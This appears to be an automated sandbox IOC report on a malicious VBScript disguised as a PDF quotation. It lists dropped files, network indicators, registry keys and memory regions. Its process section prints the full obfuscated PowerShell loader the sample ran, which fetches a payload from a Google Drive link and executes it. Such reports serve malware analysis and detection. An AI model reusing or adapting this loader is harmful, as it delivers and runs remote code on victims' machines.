IOC Report
Urgent Quotation Notification_pdf.vbs

loading gif

Files

File Path
Type
Category
Malicious
Urgent Quotation Notification_pdf.vbs
ASCII text, with very long lines (2129), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jitc4mea.v5j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qf0smckr.iuj.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndDstao riwse,nU.plMuso taaR td .nFRddi llskye l(Mal$tunCIndeT.ar ottKomiC nf aiDraaa ob ckiAcilUnniTartUnfyske, no$RatP crrPraoOffsD etKvah anoKondBaaosprnstitOphi occ msAlt) ed ';$Prosthodontics=$Dutiable;Trolddomskunsternes (Fabrikskomplekserne 'Mil$Oveg BalHngoFotbPrma oL Pr:,acs stI .hdCouOundN snIMa a B sH,u= En( CotHjuesttsUnsTExi-KispRaaaCout skHRag Ebu$,omP ierK.io HusLant enHT kOTredD rO Brnsk,TAutIUn c PasHa,) Re ');while (!$sidonias) {Trolddomskunsternes (Fabrikskomplekserne ' K $Gafghkels ioPolbIntasinl.el:El U Dossvrl stiTign TigEtheMk,nUn s Kl=To $stot erM au sye Af ') ;Trolddomskunsternes $Bufferkapaciteterne;Trolddomskunsternes (Fabrikskomplekserne 'V lssoat MiaMatrBettf,j-WatsNislsike svePlepFas Epi4Chi ');Trolddomskunsternes (Fabrikskomplekserne 'F g$P.rgC llGaloHarb C.aItal Fo: G.sBloiHypd aso A,n,tai Nua OvsDem=Clu( ,rTD teAn seartFll-WogPId,aUndtn th su Ild$UnsPCl rBetosprsMyttslah o,oLordUbeoKupnGrotO eiKo cTrisG i)Kah ') ;Trolddomskunsternes (Fabrikskomplekserne 'squ$Audg EilB.aoBorbFesaIn lFac: coOs.rrAf tDewhP ro MacKape dsrE.ta FltKeliIsotErki llc ro= k$ U gse l s os jb osa llBow: UnU Kanra dWeaeBharslucTrarundoPlasVissZoni PsnMedgjus+Bi,+ Al% yp$B sP esrHareForiEvim ncpOpsostar Retdat.HvicDrno FiuI pnReotRec ') ;$Certifiability=$Preimport[$Orthoceratitic];}$Vejlenser=275493;$Cirkelines=30624;Trolddomskunsternes (Fabrikskomplekserne 'For$ FegtimlBraoKilbGolaOlalTo.:s nM ElaCorsHelsOveeWeitsm eOver PriFascpep Tra=Epi AnGRapesemtMus-HovCMauoho,nRevt steVinnAcatMel B r$tykPQu,r.haoBlusB at Rah CyoFlidsuioPron hltO,ei stc isLyk ');Trolddomskunsternes (Fabrikskomplekserne 'Ine$AlagGtel,enoHygb MraNeglClo:CanIdiansolfTr i PrnChaisrktUn.aBehtAfseP ad su l=N g ,jl[Be s,awyChisTuntsl,eNydm sp. ArCvero usnNonvFuteA.erAt tper]ski:Vej:TofFLetrKomoPremVarBEntaUdtsElseFes6 lu4 B sstitcsnrfugistrnsvegDri(Fra$UnsMKisaTassTo.sBraeWhatNyaes.orMusi ascVer) Bo ');Trolddomskunsternes (Fabrikskomplekserne ' dr$BefgsvilHeao ocb p.aBealZi :Un MR ko HyncesiUn s,ontPeli Fos R kOl e .v D g=dor Xip[UdhsV zyGuasB ktPhyeRapmObj.st TFo,e Rux tetGra. MoEMisn Glcstao ldD ni stnFusgbor]ent:kom: emAn nsBasCHe It aIGon. G,GItae sttAl,sburtJusr M.iUdsns mg e( As$ aIK in opfBini.efnsemiflet EfaUndt laesmud.in) Dr ');Trolddomskunsternes (Fabrikskomplekserne 'Brb$D,igB nlPreoHurb,oraRealUni: rTAngrTrao K,u Mev,oie rluPyrrGarsodi1 In5Me,6,ct=sol$AllMB yo O n I i.yrss otNseibagsAp.kopbeMoo. ndsAp usaubin sDiatVanr BoiHosnTe.gAfr(Cra$ProVsyne OdjKonlHjee.ilnDe sToge Norsat,afh$damC W iGe r Miksoge L lGauiBranjobeIn s as)Pen ');Trolddomskunsternes $Trouveurs156;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://drive.usercontent.google.com(
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
http://cacerts.digi
unknown
https://drive.google.com
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.214.172
drive.google.com
142.250.186.174
drive.usercontent.google.com
142.250.186.33

IPs

IP
Domain
Country
Malicious
142.250.186.174
drive.google.com
United States
142.250.186.33
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1943386F000
heap
page read and write
1D676DFD000
heap
page read and write
1D600EB6000
trusted library allocation
page read and write
1D6765A1000
heap
page read and write
1D610010000
trusted library allocation
page read and write
19433893000
heap
page read and write
3477A3F000
stack
page read and write
194358CD000
heap
page read and write
7FF886F70000
trusted library allocation
page execute and read and write
1D601537000
trusted library allocation
page read and write
5FBA8FE000
stack
page read and write
19433916000
heap
page read and write
1D6004D6000
trusted library allocation
page read and write
194338C2000
heap
page read and write
1D674C10000
heap
page read and write
7FF887020000
trusted library allocation
page read and write
194358A6000
heap
page read and write
1943575A000
heap
page read and write
194359AB000
heap
page read and write
1D600EC6000
trusted library allocation
page read and write
19435A05000
heap
page read and write
194358D6000
heap
page read and write
1D676BA0000
heap
page execute and read and write
194358DE000
heap
page read and write
7FF886D80000
trusted library allocation
page read and write
194338E4000
heap
page read and write
1D60154F000
trusted library allocation
page read and write
1D6764E0000
trusted library allocation
page read and write
1D600EBE000
trusted library allocation
page read and write
19435957000
heap
page read and write
7FF886E3C000
trusted library allocation
page execute and read and write
347797E000
stack
page read and write
194338ED000
heap
page read and write
7FF8870D0000
trusted library allocation
page read and write
7FF886D9B000
trusted library allocation
page read and write
1D60161B000
trusted library allocation
page read and write
1D674B26000
heap
page read and write
194358DA000
heap
page read and write
194338C4000
heap
page read and write
1D601C4F000
trusted library allocation
page read and write
194358B9000
heap
page read and write
1D600EA6000
trusted library allocation
page read and write
1D6004F7000
trusted library allocation
page read and write
1D600B40000
trusted library allocation
page read and write
194358C4000
heap
page read and write
7FF886D82000
trusted library allocation
page read and write
3477343000
stack
page read and write
19433A9B000
heap
page read and write
3477CBE000
stack
page read and write
1D600226000
trusted library allocation
page read and write
1D600084000
trusted library allocation
page read and write
194358AC000
heap
page read and write
7FF886F3A000
trusted library allocation
page read and write
194337E0000
heap
page read and write
19433858000
heap
page read and write
3478909000
stack
page read and write
19435865000
heap
page read and write
1D676C00000
heap
page read and write
194358C7000
heap
page read and write
3477BB8000
stack
page read and write
1D601C38000
trusted library allocation
page read and write
1943587A000
heap
page read and write
1D600489000
trusted library allocation
page read and write
1D601C5A000
trusted library allocation
page read and write
7FF886F80000
trusted library allocation
page read and write
1D676C83000
heap
page read and write
7FF886FA0000
trusted library allocation
page read and write
7FF886FD0000
trusted library allocation
page read and write
19433916000
heap
page read and write
5FBA5FC000
stack
page read and write
5FBA3FF000
stack
page read and write
194358C1000
heap
page read and write
1D6004DB000
trusted library allocation
page read and write
1D6004F3000
trusted library allocation
page read and write
7FF886D84000
trusted library allocation
page read and write
1D600974000
trusted library allocation
page read and write
1D601648000
trusted library allocation
page read and write
5FBA4FE000
stack
page read and write
7FF887010000
trusted library allocation
page read and write
7FF887080000
trusted library allocation
page read and write
1D674B74000
heap
page read and write
19435951000
heap
page read and write
7FF886D90000
trusted library allocation
page read and write
7FF886F40000
trusted library allocation
page execute and read and write
7FF8870B0000
trusted library allocation
page read and write
1D676A95000
heap
page read and write
3477B38000
stack
page read and write
3477D3E000
stack
page read and write
19433916000
heap
page read and write
1943386E000
heap
page read and write
19433859000
heap
page read and write
7FF886DAD000
trusted library allocation
page execute and read and write
7FF887070000
trusted library allocation
page read and write
3477E3B000
stack
page read and write
19433878000
heap
page read and write
194358AD000
heap
page read and write
194358C7000
heap
page read and write
19435967000
heap
page read and write
1D601151000
trusted library allocation
page read and write
1D601C3C000
trusted library allocation
page read and write
19435752000
heap
page read and write
1D676E3F000
heap
page read and write
194358AD000
heap
page read and write
19435750000
heap
page read and write
1D60172E000
trusted library allocation
page read and write
194358C1000
heap
page read and write
194338C4000
heap
page read and write
194358C7000
heap
page read and write
7DF43C150000
trusted library allocation
page execute and read and write
7FF886F62000
trusted library allocation
page read and write
1D676AAF000
heap
page read and write
34787B8000
stack
page read and write
1943575A000
heap
page read and write
194358B9000
heap
page read and write
194358D4000
heap
page read and write
1D676420000
trusted library section
page read and write
1D674A00000
heap
page read and write
194359CF000
heap
page read and write
194338E4000
heap
page read and write
1D674C60000
heap
page read and write
19435963000
heap
page read and write
1D60179A000
trusted library allocation
page read and write
19435752000
heap
page read and write
1D601C5E000
trusted library allocation
page read and write
19435751000
heap
page read and write
19435975000
heap
page read and write
1D676BC0000
trusted library allocation
page read and write
347777E000
stack
page read and write
19435963000
heap
page read and write
1D6102FD000
trusted library allocation
page read and write
347888D000
stack
page read and write
19433916000
heap
page read and write
1D600EC2000
trusted library allocation
page read and write
1D676A90000
heap
page read and write
19433A98000
heap
page read and write
1D676E35000
heap
page read and write
194338D1000
heap
page read and write
19435898000
heap
page read and write
5FBAAFB000
stack
page read and write
19435863000
heap
page read and write
194358C1000
heap
page read and write
19435898000
heap
page read and write
1D676E0D000
heap
page read and write
7FF886E30000
trusted library allocation
page read and write
7FF886DA0000
trusted library allocation
page read and write
194358B4000
heap
page read and write
1D6004CE000
trusted library allocation
page read and write
7FF886FB0000
trusted library allocation
page read and write
7FF886D83000
trusted library allocation
page execute and read and write
1D676AE7000
heap
page read and write
1D676AE9000
heap
page read and write
1D600EAA000
trusted library allocation
page read and write
1D674B54000
heap
page read and write
7FF887060000
trusted library allocation
page read and write
194358D1000
heap
page read and write
19435963000
heap
page read and write
19435951000
heap
page read and write
194358C7000
heap
page read and write
194359AA000
heap
page read and write
1D601666000
trusted library allocation
page read and write
1943591E000
heap
page read and write
7FF886EA0000
trusted library allocation
page execute and read and write
194358C7000
heap
page read and write
194358A6000
heap
page read and write
19435962000
heap
page read and write
1D601C62000
trusted library allocation
page read and write
1D601855000
trusted library allocation
page read and write
3477DBE000
stack
page read and write
7FF886F90000
trusted library allocation
page read and write
1D6004EB000
trusted library allocation
page read and write
7FF886F50000
trusted library allocation
page execute and read and write
19433A95000
heap
page read and write
1D600EAE000
trusted library allocation
page read and write
194358B9000
heap
page read and write
7FF887050000
trusted library allocation
page read and write
1943595D000
heap
page read and write
1943595B000
heap
page read and write
1D676470000
trusted library allocation
page read and write
1D60102B000
trusted library allocation
page read and write
19433916000
heap
page read and write
19435871000
heap
page read and write
1D600E31000
trusted library allocation
page read and write
1D601C74000
trusted library allocation
page read and write
7FF887090000
trusted library allocation
page read and write
1D600ECE000
trusted library allocation
page read and write
7FF8870C0000
trusted library allocation
page read and write
194338ED000
heap
page read and write
1943388F000
heap
page read and write
1D600D75000
trusted library allocation
page read and write
7FF886D8D000
trusted library allocation
page execute and read and write
1D60110C000
trusted library allocation
page read and write
19435977000
heap
page read and write
1D676580000
heap
page read and write
1943595D000
heap
page read and write
1D674C65000
heap
page read and write
194338E7000
heap
page read and write
1D674BFE000
heap
page read and write
1D60115E000
trusted library allocation
page read and write
1D674B9C000
heap
page read and write
1D600EBA000
trusted library allocation
page read and write
1D674C40000
heap
page read and write
19433A80000
remote allocation
page read and write
19435756000
heap
page read and write
7FF886F20000
trusted library allocation
page read and write
1D6004EF000
trusted library allocation
page read and write
7FF886E66000
trusted library allocation
page execute and read and write
1D674B10000
heap
page read and write
1D600ED2000
trusted library allocation
page read and write
1D676450000
trusted library allocation
page read and write
1D601159000
trusted library allocation
page read and write
1D6764A0000
trusted library allocation
page read and write
19435751000
heap
page read and write
194358C7000
heap
page read and write
1D674B1C000
heap
page read and write
1D6004D2000
trusted library allocation
page read and write
194337B0000
heap
page read and write
19435400000
heap
page read and write
1D600ECA000
trusted library allocation
page read and write
194338EE000
heap
page read and write
1943575A000
heap
page read and write
347880E000
stack
page read and write
19435854000
heap
page read and write
1D6101B7000
trusted library allocation
page read and write
19435944000
heap
page read and write
1D600491000
trusted library allocation
page read and write
1D600437000
trusted library allocation
page read and write
194358C1000
heap
page read and write
194358B9000
heap
page read and write
19433A80000
remote allocation
page read and write
1D601DC4000
trusted library allocation
page read and write
1D676430000
trusted library allocation
page read and write
194358AC000
heap
page read and write
1D60047E000
trusted library allocation
page read and write
1D6005E1000
trusted library allocation
page read and write
1D676597000
heap
page read and write
7FF886FF0000
trusted library allocation
page read and write
1D60186A000
trusted library allocation
page read and write
7FF8870A0000
trusted library allocation
page read and write
1943596C000
heap
page read and write
1D676C50000
heap
page execute and read and write
1D601C52000
trusted library allocation
page read and write
1943595A000
heap
page read and write
1D601CC9000
trusted library allocation
page read and write
7FF886E36000
trusted library allocation
page read and write
1D600F50000
trusted library allocation
page read and write
194358B9000
heap
page read and write
19435867000
heap
page read and write
1D601CCD000
trusted library allocation
page read and write
1D6004DF000
trusted library allocation
page read and write
19433878000
heap
page read and write
194358DC000
heap
page read and write
5FB9D99000
stack
page read and write
1D601165000
trusted library allocation
page read and write
1943596E000
heap
page read and write
1D676460000
heap
page readonly
19435851000
heap
page read and write
1D6016ED000
trusted library allocation
page read and write
1D676C57000
heap
page execute and read and write
194358D4000
heap
page read and write
19433906000
heap
page read and write
19435898000
heap
page read and write
1D676B5F000
heap
page read and write
7FF886FC0000
trusted library allocation
page read and write
5FBA7FE000
stack
page read and write
1D676AB9000
heap
page read and write
19433910000
heap
page read and write
7FF8870F0000
trusted library allocation
page read and write
1D6017D6000
trusted library allocation
page read and write
1D674BA3000
heap
page read and write
1D6004E3000
trusted library allocation
page read and write
19433916000
heap
page read and write
194358C4000
heap
page read and write
7FF887040000
trusted library allocation
page read and write
1D60071F000
trusted library allocation
page read and write
1D676B76000
heap
page read and write
1D600F60000
trusted library allocation
page read and write
1D60048D000
trusted library allocation
page read and write
1D600EB2000
trusted library allocation
page read and write
7FF887000000
trusted library allocation
page read and write
1D600A02000
trusted library allocation
page read and write
1D676D60000
heap
page read and write
19435950000
heap
page read and write
194358F1000
heap
page read and write
194358C1000
heap
page read and write
1D601679000
trusted library allocation
page read and write
1D6004E7000
trusted library allocation
page read and write
194338C2000
heap
page read and write
7FF886DDC000
trusted library allocation
page execute and read and write
1D676590000
heap
page read and write
194358C4000
heap
page read and write
34779F8000
stack
page read and write
19435888000
heap
page read and write
194359FB000
heap
page read and write
1D676410000
trusted library section
page read and write
5FBA6FB000
stack
page read and write
194358B9000
heap
page read and write
194338C4000
heap
page read and write
7FF886E40000
trusted library allocation
page execute and read and write
1943595D000
heap
page read and write
194358A9000
heap
page read and write
194338C2000
heap
page read and write
194358A6000
heap
page read and write
194358E0000
heap
page read and write
1D674AE0000
heap
page read and write
1D60167B000
trusted library allocation
page read and write
1D6017B5000
trusted library allocation
page read and write
19433A80000
remote allocation
page read and write
1D60049D000
trusted library allocation
page read and write
1D674B60000
heap
page read and write
19433A90000
heap
page read and write
1D676D9F000
heap
page read and write
194338D1000
heap
page read and write
5FBA1FE000
stack
page read and write
19433A98000
heap
page read and write
7FF8870E0000
trusted library allocation
page read and write
1D676C80000
heap
page read and write
7FF886FE0000
trusted library allocation
page read and write
1D600001000
trusted library allocation
page read and write
19435850000
heap
page read and write
1D60175D000
trusted library allocation
page read and write
1D676BC3000
trusted library allocation
page read and write
1D601C8F000
trusted library allocation
page read and write
34777FC000
stack
page read and write
1D610074000
trusted library allocation
page read and write
1D676740000
heap
page execute and read and write
1D6004B5000
trusted library allocation
page read and write
1D600ED6000
trusted library allocation
page read and write
1943596E000
heap
page read and write
1D676B50000
heap
page read and write
194358D8000
heap
page read and write
19433830000
heap
page read and write
1D601CD1000
trusted library allocation
page read and write
34778FE000
stack
page read and write
194358A6000
heap
page read and write
1D60049B000
trusted library allocation
page read and write
7FF886F31000
trusted library allocation
page read and write
194338E4000
heap
page read and write
194358C4000
heap
page read and write
1D601608000
trusted library allocation
page read and write
194358C7000
heap
page read and write
194358B9000
heap
page read and write
194358AD000
heap
page read and write
19435953000
heap
page read and write
194358C4000
heap
page read and write
1D600B4A000
trusted library allocation
page read and write
7FF887030000
trusted library allocation
page read and write
19435873000
heap
page read and write
194338C4000
heap
page read and write
5FBA0FE000
stack
page read and write
19435757000
heap
page read and write
1D6017B8000
trusted library allocation
page read and write
194358D1000
heap
page read and write
194337C0000
heap
page read and write
7FF887100000
trusted library allocation
page execute and read and write
1943597D000
heap
page read and write
1D676595000
heap
page read and write
1D601829000
trusted library allocation
page read and write
194338C2000
heap
page read and write
1D601652000
trusted library allocation
page read and write
1943575A000
heap
page read and write
1D610001000
trusted library allocation
page read and write
1D601162000
trusted library allocation
page read and write
There are 352 hidden memdumps, click here to show them.